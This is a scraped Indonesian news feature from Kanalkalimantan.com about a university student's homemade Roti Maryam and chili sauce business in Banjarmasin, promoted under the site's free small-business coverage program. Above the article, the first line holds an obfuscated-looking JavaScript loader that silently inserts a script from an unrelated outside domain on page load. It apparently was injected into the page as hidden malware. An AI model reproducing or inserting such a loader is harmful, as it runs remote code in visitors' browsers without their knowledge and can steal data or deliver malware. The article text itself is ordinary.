(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Gandeng UMKM

Menikmati Lezatnya Roti Maryam by Ummii yang Bikin Ketagihan!


KANALKALIMANTAN.COM, BANJARMASIN– Roti Maryam merupakan makanan khas dari Timur Tengah yang biasa disebut Roti Canai. Roti Maryam ini mempunyai ciri yang khas karena bentuknya yang bulat, bertekstur lembut dan berlapis-lapis, memakan nya pun bisa sedikit demi sedikit sesuai dengan lapisan-lapisan yang terdapat pada Roti Maryam.

Nah, jika kamu pingin menikmati suguhan Roti Maryam yang lezat, kamu bisa dapatkan di Roti Maryam & Sambal Bapirik Ummii. Apalagi, jika kamu padu padankan kelezatan Roti Maryam Ummi ini dengan Keju, Susu, Cokelat, Gula Pasir, dan lain-lain. Hmmm…. semakin nikmat tentunya!

Menikmati Roti Maryam ini sangat cocok disantap saat pagi hari, ketika sarapan menikmati Roti Maryam ini mampu menambah energi untuk memulai aktivitas Karena mengandung karbohidrat yang mampu membuat perut lapar menjadi terasa kenyang.

Menurut Norlatifah, pertama kali merintis usaha ini dari hoby masak. Dari situlah, ia mulai membuka usaha roti Maryam ini dengan modal yang pas-pas an walaupun masih usaha rumahan kecil-kecilan.

“Pembuatan roti ini memang Asli dari tangan saya sendiri(homemade) merk dan label nya pun punya sendiri. Awal nya tidak terfikir sama sekali untuk bikin usaha roti, namun banyak dukungan dari orang tua maupun keluarga meminta saya untuk lebih mengembangkan hoby saya menjadi peluang usaha tersendiri,” kata mahasiswi di Universitas Islam Negeri (UIN) Antasari Banjarmasin.

Norlatifah mengatakan, dengan membuka usaha roti ini untuk sedikit mengurangi beban orang tua dan ingin belajar mandiri agar punya penghasilan dan usaha sendiri. “Awalnya sih ada sedikit tidak yakin takut mengganggu kuliah, namun, perlahan saya bagi dan atur yang mana khusus usaha dan untuk belajar. Alhamdulillah, sekarang saya bisa mengimbangi dimana waktu kuliah dan dimana waktu untuk usaha,” katanya.

Roti Maryam Ummii saat ini pun berkembang semakin dikenal. Jika dulu omzet hanya dapat mengembalikan modal sekarang melebihi omzet yang ditargetkan.  “Respon dari masyarakat Alhamdulillah sangat baik, dan mereka pun tertarik membelinya sampai ada yang bertanya apa saja resep dari Roti Maryam ini. Karena bukan hanya dari kalangan anak-anak saja yang menyukai Roti ini Orang dewasa pun juga sangat suka. Pokok nya Alhamdulilah sangat diterima sekali oleh masyarakat sekitar,” ungkapnya.

Dengan bergabung program #Gandeng_UMKM Kanalkalimantan.com, ia berharap usahanya saya lebih dikenal orang dan dapat membuat para para muda mudi di luar termotivasi dan bersemangat dalam berkarya.

ALAMAT:
Jika ingin menikmati kelezatan Roti Maryam dan Sambal Bapirik by Ummii, kamu bisa dapatkan di alamat: Jl. Manunggal II Gang V Kecamatan Banjarmasin Timur, atau dengan WA : 082251175407, IG : @rotimaryam.ummii, IG : @sambal_bapirik

PRODUK:
Harga Roti Maryam : IDR 15.000 Isi 3pcs
Harga Sambal Bapirik: IDR 25.000/pcs

Apa itu #GandengUMKM?

Program gandeng UMKM yang  dilaunching Kanalkalimantan.com, yakni menghadirkan liputan eksklusif bagi para pelaku UMKM di Kalimantan Selatan tanpa dipungut biaya alias gratis. Setiap UMKM yang sudah mengirimkan profil dan katalog produknya, akan dipublikasikan di web Kanalkalimantan.com dan semua akun media sosial kami.

Pada program ini, Kanalkalimantan.com juga mengajak mitra pemilik dan pengelola akun media sosial untuk bersama membantu UMKM. Seperti halnya Shalokal Grup (shalokal,com & @shalokal.com_instabaiman), Kabar Banua Kalsel (@kabar_banua_kalsel), Info Daha Negara (@infodahanegara), Sejarah Banua (@sejarah_banua) dan Tanah Laut Info (@tanahlautinfo).

“Adapun caranya adalah dengan ikut memposting ‘aset promo’ yang telah kami sediakan, dan aset promo ini pun nantinya akan kami sertakan/tampilkan logo dari setiap akun sosmed yang ikut mendukung,” kata Kepala Divisi Program dan Kreatif Kanalkalimantan.com, Andy Arfian.

Andy berharap, melalui program ini para UMKM juga menemukan calon pembeli yang cukup signifikan untuk mendongkrak usaha. Sebab dengan bantuan media online dan medsos lainnya, otomatis pasar online akan terbuka lebih lebar.

“Melalui program ini, UMKM akan lebih dikenal. Apalagi ke depan kami juga akan melakukan pembinaan dengan menggandeng sejumlah pakar untuk bersama memberikan masukan terkait pengembangan bisnis sektor UMKM,” tegasnya.

Untuk bergabung dalam program ini, para pelaku UMKM tinggal mengirim profile dan katalog ke email: kanalkalimantancreative@gmail.com. (Selengkapnya bisa dilihat pada infografis, Red).

(Kanalkalimantan.com/cel)

Editor: Cell


Desy Arfianty

Recent Posts

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

10 menit ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

2 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

2 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

2 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

4 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

5 jam ago

This website uses cookies.